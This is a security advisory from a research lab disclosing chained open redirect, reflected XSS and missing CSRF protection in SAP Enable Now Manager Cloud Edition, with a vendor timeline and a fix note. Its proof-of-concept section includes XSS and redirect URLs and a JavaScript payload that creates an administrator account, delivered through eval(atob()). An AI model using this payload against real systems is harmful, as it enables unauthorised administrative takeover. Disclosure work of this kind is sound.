SEC Consult Vulnerability Lab Security Advisory < 20230927-0 > ======================================================================= title: Multiple Vulnerabilities product: SAP® Enable Now Manager vulnerable version: 10.6.5 (Build 2804) Cloud Edition fixed version: May 2023 Release CVE number: N/A (cloud) impact: high homepage: https://www.sap.com/about.html found: 2022-10-21 by: Paul Serban (Eviden) Fabian Hagg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP Enable Now solution provides advanced in-application help and training capabilities helping you to improve productivity and user adoption, as well as to increase satisfaction of the end-user experience. Create, maintain, and deliver in-application help, learning materials, and documentation content easily." Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now Business recommendation: ------------------------ Due to the Cloud Edition being affected, the vendor automatically pushed a fix in the production environment in the May 2023 Release. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues. Vulnerability overview/description: ----------------------------------- Multiple vulnerabilities were identified that could be chained together in order to allow a remote, unauthenticated attacker to create new administrative user accounts by tricking the victim to click on a malicious link or visit a malicious website prepared by the attacker. 1) Open Redirect/URL Redirection Vulnerability The file download feature of the application contains an unvalidated parameter value that exposes it to an open redirect vulnerability. An attacker can create a malicious URL which would redirect the victim to a malicious site, for example, a phishing site convincing the victim to login once again. 2) Reflected Cross Site Scripting (XSS) A reflected XSS vulnerability was found affecting the same parameter as used in 1). Due to insufficient input validation and output encoding, an attacker can inject arbitrary HTML or JavaScript code into the generated server response, executing it in the browser of the victim. The vulnerability, can be exploited, for example, to create new administrative user accounts in the application, thereby fully compromising the application. Any CSRF protection can be bypassed by means of this vulnerability. 3) Insufficient Cross-Site Request Forgery (CSRF) Protection No implementation of CSRF protection was detected in the application. Using this vulnerability, an attacker can issue requests in the context of administrative user sessions. This includes critical state changing actions such as user creation or role assignment. Note that in the test environment the option 'Supported Functions' was set to value 'DISABLE-CSRF-PROTECTION' in the server settings feature of the application. Certain configurations require this setting to be enabled, e.g. to allow the SEN Workflow Approver extension to submit the data on behalf of the logged-in user to the SAP Enable Now Manager. Without this parameter, the extension will only be able to read the content and workflow information) This indicates that there is an insecure feature which allows the protection mechanism to be disabled globally. It could not be clarified if this is the default setting. In any case, the function should still be enhanced to protect critical actions such as functions used in user management or role/permission management even if the mechanism is disabled by configuration. Proof of concept: ----------------- 1) Open Redirect/URL Redirection Vulnerability The public endpoint /resources/open_file.html is vulnerable to an open redirect via GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser. https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com After browsing to the above link, the victim gets redirected to www.sec-consult.com in a new browser window opened by the embedded call of function window.open(). Note that both attacker and victim do not have to be authenticated for successful exploitation. 2) Reflected Cross-Site Scripting (XSS) The public endpoint /resources/open_file.html is affected by an XSS vulnerability in GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser. https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain) After browsing to the above link, the domain property returns the domain name of the server it was loaded from an alert window within the browser of the victim. This proves the successful execution of the injected JavaScript code. In fact, any kind of JavaScript code could be injected by the attacker. Note that both attacker and victim do not have to be authenticated for successful exploitation. 3) Insufficient Cross-Site Request Forgery (CSRF) Protection No CSRF protection can be observed in POST requests sent between the client and server. This includes at least the functions "task creation", "user creation", "permission assignment" and "role/group assignment". Note that this vulnerability appears to only affect systems where the CSRF protection is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION' in the server settings. Although this setting can be reverted, it is advised to have the protection enabled for critical operations such as user creation or permission assignment at any time (also when the option is set). Several of the vulnerabilities above can be chained together by an unauthenticated attacker. Considering the types of vulnerabilities, there are multiple exploitation scenarios. In our example we will create a link that, when clicked by an administrator victim, will create a new admin account. For this attack to work, we first need to gather some information. To create an account, we need to know two important values: the OU and the UID. The OU represents the Organizational Unit unique identifier. The UID here represents the unique Group ID of our target group where we want our new user to be added. Performing a simple GET request to endpoint /self/group, both values can be obtained. The following listing shows the server response. ------------------------------------------------------------------------------------------------ HTTP/1.1 200 Cache-Control: no-cache, no-store, must-revalidate Expires: 0 Vary: Origin Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly; Content-Type: text/json;charset=UTF-8 Server: SAP Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 396 {"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086", "ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid": "G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name ":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU 10C ","active":true}]}} ------------------------------------------------------------------------------------------------ Finally, in order for the attack to succeed, the attacker needs the victim (logged in as administrator) to do first a request on the above endpoint, then a POST request on the endpoint /!/user to actually create the new user account with the administrator role assigned using the values taken from the previous response. These interactions can be scripted using the following ten lines of JavaScript code. ------------------------------------------------------------------------------------------------ var req1 = new XMLHttpRequest(); req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false); req1.withCredentials = true; req1.send(); var obj = JSON.parse(req1.responseText).response; for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}}; var req2 = new XMLHttpRequest(); req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false); req2.withCredentials = true; req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}})); ------------------------------------------------------------------------------------------------ We can base64-encode this payload and pass it to the Javascript eval(atob()) function using the XSS vulnerability in the file download feature (seen in 2.). The link could then be shortened to enhance the likelihood of successful exploitation. This can be achieved, for example, by leveraging the Open Redirect vulnerability (seen in 1.) to redirect the victim to an attacker-controlled website and trigger the above payload, making it an attack more likely to succeed. If the victim is logged into the application and is part of the Administrator group, when they click on this link, a new admin account will be instantly created. The attacker then can log in and has full control over the application. Vulnerable / tested versions: ----------------------------- The following versions of the software were found to be vulnerable during our tests: - SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022) Vendor contact timeline: ------------------------ 2022-11-08: Contacting vendor via secure@sap.com 2022-11-10: Vendor requested screenshots and steps to reproduce 2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce and screenshots weren't available at that time 2022-11-10: Vendor confirmed issues are under review 2022-11-18: Contacted vendor to request an update 2022-11-18: Vendor confirmed issues are still under review 2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to the Engineering Team 2023-02-02: Contacted vendor to request an update 2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a release schedule. 2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564 2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix 2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release 2023-05-08: Vendor confirmed fix was deployed to production for 2280196563 2023-09-27: Public release of security advisory. Solution: --------- Due to the Cloud Edition being affected, the vendor automatically pushed a fix in the production environment in the May 2023 Release. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF P. Serban, F. Hagg / @2023